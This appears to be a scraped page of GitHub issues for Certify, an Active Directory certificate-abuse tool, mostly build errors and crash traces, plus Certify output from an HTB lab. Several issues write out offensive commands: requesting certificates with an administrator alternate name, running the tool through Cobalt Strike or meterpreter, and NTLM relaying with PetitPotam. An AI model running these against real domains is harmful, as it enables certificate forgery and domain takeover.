                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : WebServer
Schema Version                        : 1
Validity Period                       : 2 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : NONE
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Server Authentication
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : SubCA
Schema Version                        : 1
Validity Period                       : 5 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : NONE
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : <null>
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : DomainControllerAuthentication
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy  : Client Authentication, Server Authentication, Smart Card Logon
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : DirectoryEmailReplication
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Directory Service Email Replication
mspki-certificate-application-policy  : Directory Service Email Replication
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : KerberosAuthentication
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy  : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                  NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

Certify completed in 00:00:08.1763365
Evil-WinRM PS C:\Users\Raven\AppData\Local\Temp>

compile error CS1617

Hi
I tried to complie the program using visual studio 2017 , and i got this error :

CSC : error CS1617: Invalid option '9.0' for /langversion; must be ISO-1, ISO-2, Default or an integer in range 1 to 6.

Unable to build Certify - This project references NuGet package(s) that are missing on this computer

Hello,

Let me start off stating that I am far from a Visual Studio expert but I have successfully built projects before, including Rubeus.

I have installed Visual Studio 2019 Community Edition and I have downloaded the project, opened the project, and then selected "Release" (as opposed to "Debug") and then selected Build and I am getting the error below (as well as several others - see screenshot).

Severity Code Description Project File Line Suppression State
Error This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is ..\packages\dnMerge.0.5.15\build\dnMerge.targets. Certify C:\Users\rstrom\source\repos\Certify-main\Certify\Certify.csproj 129

Hopefully this is either something really stupid that I am not doing correctly or something easy to fix. Really looking to get this built so that I can do testing and the necessary validation of fixes.

image

Thanks much!

Crashes on Server 2012R2 - possibly related to certlib version.

As discussed on BH slack:

Compiled Certify on Win10 2004 with VS2019.
Executed via Cobalt Strike's execute-assembly on Windows Server 2012R2.
Certify.exe find /vulnerable appeared to work fine.
Certify.exe request /ca:**REDACTED** /template:**REDACTED** /altname:**REDACTED* threw the following exception:

System.InvalidCastException: Unable to cast COM object of type 'CERTENROLLLib.CX509PrivateKeyClass' to interface type 'CERTENROLLLib.IX509PrivateKey2'. This operation failed because the QueryInterface call on the COM component for the interface with IID '{728AB362-217D-11DA-B2A4-000E7BBB2B09}' failed due to the following error: No such interface supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE)).
   at System.StubHelpers.StubHelpers.GetCOMIPFromRCW(Object objSrc, IntPtr pCPCMD, IntPtr& ppTarget, Boolean& pfNeedsRelease)
   at CERTENROLLLib.CX509PrivateKeyClass.set_Length(Int32 pValue)
   at Certify.Cert.CreatePrivateKey(Boolean machineContext)
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

After some trial and error I found that by changing CreatePrivateKey() to return a CX509PrivateKey instead of IX509PrivateKey (and compiling it on Server2012) I could get Certify to request a cert and receive a valid-looking pem-formatted cert back from the CA.

Unfortunately, when trying to actually use the cert with Rubeus.exe asktgt I was getting KDC_ERR_CLIENT_NOT_TRUSTED. On further examination of the pem-formatted cert that certify gave me back (with openssl x509 -in cert.pem -text I noticed that the SAN field wasn't as expected, and was instead showing this:

            X509v3 Subject Alternative Name: 
                othername:<unsupported>

Let me know if there's any other details I can provide to help troubleshoot and I'll do my best.

[help wanted] AD CS /certsrv Endpoint authentication failed.

First of all, thanks for your excellent research work.

I'm trying to reproduce it using a Windows Server 2012 R2 with no patches installed either automatically or manually.

I installed AD CS using all default options offered by the setup wizard.

When I invoke the Python script from https://github.com/topotam/PetitPotam and cooperate it with ntlmrelayx from https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack , it just kept telling me HTTP 401 Unauthorized.

Since it's totally all default situation, I have no idea what's wrong with it to reproduce.

More information might be useful for debugging:

  • Certificate can be requested via any other machine in the domain. DC itself also has a certificate. Any other machine also can request machine account certificate in GUI.
  • Web Endpoint /certsrv will ask for human user credential, then it works as intended. But in this situation, machine account NTLM authentication seems not to work.
  • If I replace ntlmrelayx with responder, I could successfully get a response and hash captured notice from responder, which means, at least, NTLM Relay part, works fine.

Thanks for your help in advance.

Virus alert

When I compile certify.exe my computer alerts that there is a virus and the file is immediately deleted. I am hesitant to disable anti virus but is that the only option?

Crash on Windows Server 2016

Hi,

I was trying out some requests and an exception is returned during execution.
Compiled on Windows Server 2022 with VS2019.

.\Certify.exe find /vulnerable or .\Certify.exe find /clientauth works fine.
The error comes when I try the following command: .\Certify.exe request /ca:REDACTED /template:REDACTED /altname:DOMAIN\REDACTED

[*] Action: Request a Certificates

[!] Unhandled Certify exception:

System.IO.FileNotFoundException: Could not load file or assembly 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
File name: 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

WRN: Assembly binding logging is turned OFF.
To enable assembly bind failure logging, set the registry value [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD) to 1.
Note: There is some performance penalty associated with assembly bind failure logging.
To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].

No cert is returned after the exception.
The script is executed directly on a AD CS, with admin rights.

Edit: This exception also occurs when using the download function.

Unable to cast COM object of type 'CERTENROLLLib.CX509PrivateKeyClass'

env:
CS : server 2012
Client : server 2012

When I apply for a template, the following error occurs.

error description:

/ | | | ()/ |
| | ___ _ | | | | _ _
| | / _ \ '_| | | | | | |
| || __/ | | || | | | || |
____|| _||| _, |
/ |
|./
v1.1.0

[*] Action: Request a Certificates

[] Current user context : TEST\wangqiang
[] No subject name specified, using current context as subject.

[] Template : ESC1
[] Subject : CN=Wang Qiang, OU=company, DC=test, DC=com
[*] AltName : cadmin

[!] Unhandled Certify exception:

System.InvalidCastException: Unable to cast COM object of type 'CERTENROLLLib.CX509PrivateKeyClass' to interface type 'CERTENROLLLib.IX509PrivateKey2'. This operation failed because the QueryInterface call on the COM component for the interface with IID '{728AB362-217D-11DA-B2A4-000E7BBB2B09}' failed due to the following error: No such interface supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE)).
at System.StubHelpers.StubHelpers.GetCOMIPFromRCW(Object objSrc, IntPtr pCPCMD, IntPtr& ppTarget, Boolean& pfNeedsRelease)
at CERTENROLLLib.CX509PrivateKeyClass.set_Length(Int32 pValue)
at Certify.Cert.CreatePrivateKey(Boolean machineContext)
at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName, String sidExtension)
at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, String sidExtension, Boolean install)
at Certify.Commands.Request.Execute(Dictionary2 arguments) at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Certify completed in 00:00:00.2333173

Building failed with CERTCLILib not found

Not sure if I'm missing something obvious, as I'm not familiar with .NET, but getting the following error when building.

1>C:\Users\User\Desktop\Certify-main\Certify\Lib\Cert.cs(4,7,4,17): error CS0246: The type or namespace name 'CERTCLILib' could not be found (are you missing a using directive or an assembly reference?)

asktgt

Does this tool have command of 'asktgt'?

Not working in non domain computer

Hi, Probably you already aware about problems related to running certify in non domain machine. Even if I tried different test cases (runas, netonly, ptt, cmd over pth) each time I got exception and I was not able to request certificate. Could you please recommend me what can I do for this in case if you don't plan any code updates for this issue?
Thanks

Could not Connect to HKLM Hive

I am seeing this error recently when I run it in my lab domain. There are 3 CAs currently and when running certify.exe from a domain joined machine I get the following error as it is looping through CAs

UserSpecifiedSAN : Could not connect to the HKLM hive - The network path was not found.

I am sure I am doing something wrong here, but I cant figure out what

System.ArgumentNullException: Value cannot be null.

Running v1.1.0 on Win10 21H2 :
Certify.exe find /vulnerable

results in the following error message:

[!] Unhandled Certify exception:

System.ArgumentNullException: Value cannot be null.
Parameter name: source
   at System.Linq.Enumerable.Contains[TSource](IEnumerable`1 source, TSource value, IEqualityComparer`1 comparer)
   at Certify.Commands.Find.IsCertificateTemplateVulnerable(CertificateTemplate template, List`1 currentUserSids)
   at Certify.Commands.Find.<>c__DisplayClass19_0.<ShowVulnerableTemplates>b__0(CertificateTemplate t)
   at System.Linq.Enumerable.WhereSelectListIterator`2.MoveNext()
   at System.Linq.Buffer`1..ctor(IEnumerable`1 source)
   at System.Linq.Enumerable.ToArray[TSource](IEnumerable`1 source)
   at Certify.Commands.Find.ShowVulnerableTemplates(IEnumerable`1 templates, IEnumerable`1 cas, List`1 currentUserSids)
   at Certify.Commands.Find.FindTemplates(Boolean outputJSON)
   at Certify.Commands.Find.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
```

Running version 1.0.0 is successful.

Unhandled Exception by meterpreter/shell.

If i run

.\Certify.exe find

from meterpreter (execute -i -f ...) or from meterpreter shell, i got this error.

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=essos,DC=local'

[!] Unhandled Certify exception:

System.DirectoryServices.DirectoryServicesCOMException (0x80072020): An operations error occurred.

   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
   at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
   at Certify.Lib.LdapOperations.GetEnterpriseCAs(String caName)
   at Certify.Commands.Find.FindTemplates(Boolean outputJSON)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


Certify completed in 00:00:00.0272533

It is good then i run by RDP or WinRM, but how to fix this problem?

GOAD, Microsoft Windows Server 2016 Standard Evaluation

Certify over Winrm

Hi,
I am new to blue teaming activities. I am trying to use certify to work on abusing ADCS service in my lab.

I am using a server for performing all attacks. I am logged into that PC using standard user and trying to gain access to user with local admin rights and then perform other enumeration
I have used whisker and rubeus to get TGT of local admin and used winrs to connect to CMD using that admin on the same server
Now when I am trying to run certify commands like certify cas, find, pkiobjects etc but getting the errors

Same is happening with other tools like Sharpshares etc.

Can someone suggest

Can Certify be made Kerberos aware?

Hi. Thank you very much for your effort that went into all this research!

I am trying to abuse ESC6 from a non domain-joined machine. I am aware of the tools Certi and PKINITTools for Linux but at least Certi is not fully working at the moment. The other alternative is to use Certify on a non domain-joined Windows box but for that to work Certify must be Kerberos aware. I can use Rubues to request a TGT and pass that into RAM. When that is done I can execute for example the command "certutil -config "server2.adlab.local\adlab-SERVER2-CA" -getreg "policy\EditFlags"" meaning that command can be run outside of a domain and that Certutil is Kerberos aware. Using Certify after requesting and passing a TGT using Rubeus results only in various crashes of Certify. For example:

PS C:\temp> .\certify.exe request /ca:server2.adlab.local\adlab-SERVER2-CA /template:User /altname:administrator

[] Action: Request a Certificates
[] Current user context : CLIENT2\localadmin1
[!] Unhandled Certify exception:

System.NullReferenceException: Object reference not set to an instance of an object.
at Certify.Cert.GetCurrentUserDN()
at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
at Certify.Commands.Request.Execute(Dictionary2 arguments) at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

I have also tried the flags "/machine" and/or "/ca:[ADCS server IP]" but Certify still crashes.

Unable to cast object of type 'System.DirectoryServices.AccountManagement.GroupPrincipal' to type 'System.DirectoryServices.AccountManagement.UserPrincipal' 

.\Certify.exe request /ca:LBABEPW114.REDACTED.com\REDACTED-Enterprise-Root-CA01 /template:REDACTEDCA01 /altname:REDACTEDUSER /domain:REDACTED.com /ldapserver:LBABEPW121.REDACTED.com

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : REDACTEDDOMAIN\REDACTEDUSER

[!] Unhandled Certify exception:

System.InvalidCastException: Unable to cast object of type 'System.DirectoryServices.AccountManagement.GroupPrincipal' to type 'System.DirectoryServices.AccountManagement.UserPrincipal'.
   at System.DirectoryServices.AccountManagement.UserPrincipal.FindByIdentity(PrincipalContext context, IdentityType identityType, String identityValue)
   at System.DirectoryServices.AccountManagement.UserPrincipal.get_Current()
   at Certify.Cert.GetCurrentUserDN()
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName, String sidExtension)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, String sidExtension, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary 2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary 2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary 2 parsedArgs)


Certify completed in 00:00:00.1875661```

I have no idea where this is coming from. I tried with different Certify versions but keep getting this error.

Unable to find type [Certify.Program]

Hi,
by following https://github.com/GhostPack/Certify#sidenote-running-certify-through-powershell and without any AV active, when I try to execute the Main() program it returns:

$ [Certify.Program]::Main("find /vulnerable".Split())
Unable to find type [Certify.Program].
At line:1 char:1
+ [Certify.Program]::Main("find /vulnerable".Split())
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (Certify.Program:TypeName) [], RuntimeException
    + FullyQualifiedErrorId : TypeNotFound

The assembly seems loaded correctly in memory since I can tab through the attributes/methods etc but the "Program" does not seem to be callable.

Any hints on why this happens?

Tested on Win10 19042

`certify request` not working with ptt/pth

Awesome project! Hope following issue can be fixed:

Similar with #13 , it seems that the user context cannot be changed which always be current user (no relevant parameters supplied), lead that we can't request certificate by obtained ntlm hash or tgt.

Tested on a domain-joined machine, I've tried pth by mimikatz & createnetonly by rubeus , neither did they working.

However runas /netonly /user:domain\user cmd can do certify request successfully (assuming I've obtained the plain text passwd of victim).

Please check this, thanks a lot.

The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)

Getting this error while running:
certify.exe request /ca:CASERVER.thisisalongdomainlol.com\Issuing-External-CA /template:VulnTemplate /altname:Administrator

My Subject name according to certify is:
CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com

Any ideas on how to deal with this error? Sounds like a legitimate issue for which you have to permit longer than 64 character subject names on the ADCS server according to this: https://www.open-a-socket.com/2014/07/24/the-request-subject-name-is-invalid-or-too-long/

Below is the full output with redacted info, this pentest is about to end but it might help the next person if this gets answered.

[*] Current user context    : thisisalongdomainlol\Contos
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate 
[*] Subject                 : CN=TEST2\,  Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
[*] AltName                 : administrator

[*] Certificate Authority   : CASERVER.thisisalongdomainlol.com\Issuing-External-CA

[!] CA Response             : The submission failed: Error Parsing Request  The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
[!] Last status             : 0x80094001
[*] Request ID              : 0

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
abcde
-----END RSA PRIVATE KEY-----

[X] Error downloading certificate: CCertRequest::RetrievePending: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx


Certify completed in 00:00:08.5331567

Hopefully there is something that can be done rather than running a command on the AD CS server :/

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.